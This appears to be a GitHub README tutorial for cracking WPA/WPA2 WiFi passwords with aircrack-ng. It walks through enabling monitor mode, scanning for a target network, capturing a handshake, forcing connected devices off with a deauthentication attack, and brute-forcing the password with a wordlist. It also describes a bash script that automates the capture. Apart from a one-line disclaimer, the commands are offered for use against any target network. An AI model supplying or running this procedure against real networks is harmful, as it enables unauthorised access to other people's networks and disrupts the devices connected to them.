You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
cracking WPA/WPA2 secured WiFi networks with the aircrack-ng suite
This guide is for educational purposes only and should not be used for any illegal activities. The author and publisher is not liable for any illegal use.
Monitor mode allows the WiFi adapter to capture all WiFi packages in the air. Before enabling monitor mode, make sure the WiFi adapter is connected to the system. Check that, by running iwconfig. The adapter should be listed with a name like wlan0 or wlan1:
wlan0 unassociated ESSID:"" Nickname:"<WIFI@REALTEK>"
Mode:Managed Frequency=2.412 GHz Access Point: Not-Associated
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
To enable monitor mode, we first need to stop processes that might interfere with the adapter:
sudo airmon-ng check kill
Next, we can enable monitor mode on the adapter:
sudo airmon-ng start wlan0 # replace wlan0 with the name of your adapter
Look for target network
To find the target network, we can use airodump-ng, which is a tool from the aircrack-ng suite. This tool lists all WiFi networks in the area, including their BSSID, ESSID, channel, etc.:
airodump-ng wlan0 # replace wlan0 with the name of your adapter (your adapter might have a different name after enabling monitor mode, to check run iwconfig)
write down the BSSID and channel of the target network.
Capture handshake
When a device connects to a WiFi network, a so-called handshake is exchanged between the device and the access point. This handshake can be captured and used to crack the WiFi password. To capture the handshake, we need to run airodump-ng again, but this time we need to specify the BSSID and channel of the target network:
airodump-ng -d AA:AB:AC:AD:AE:AF -c 1 --write handshake wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network, 1 with the channel of the target network and wlan0 with the name of your adapter
this command starts listening for the handshake. Once a device connects to the target network, the handshake will be captured and saved to a file called handshake-01.cap. An indicator will show when the handshake is captured; it will appear on the first line after the date and time (you can safely stop the process with Ctrl + C after the handshake was captured):
Optionally, you can speed up the process by deauthenticating all device currently connected to the target network and forcing them to reconnect and establish a new handshake:
# --deauth specifies the number of deauthentications to send (5 in this case)
aireplay-ng --deauth 5 -a AA:AB:AC:AD:AE:AF wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network and wlan0 with the name of your adapter
Crack the password
To crack the password, we need to use a wordlist. A wordlist is a list of possible passwords that will be tried one by one until the correct password is found. In this guide, we will use the rockyou.txt wordlist, which is a popular wordlist that comes pre-installed on Kali Linux. To crack the password, we need to run aircrack-ng and specify the wordlist and the captured handshake:
And Voila! The password was cracked in only 8 seconds after testing 40629 other passwords. In this case, the password was test1234.
Script automation
Because the process of capturing the handshake is always the same and can be quite tedious, I've automated the process with a simple bash script. It takes two parameters:
(required) the name of the target network
(optional) the name of the adapter - default: wlan0
it does all the steps until capturing the handshake and throws you directly into the airodump-ng target network sniff. You only have to wait for the handshake to be captured and then run the aircrack-ng command to crack the password.
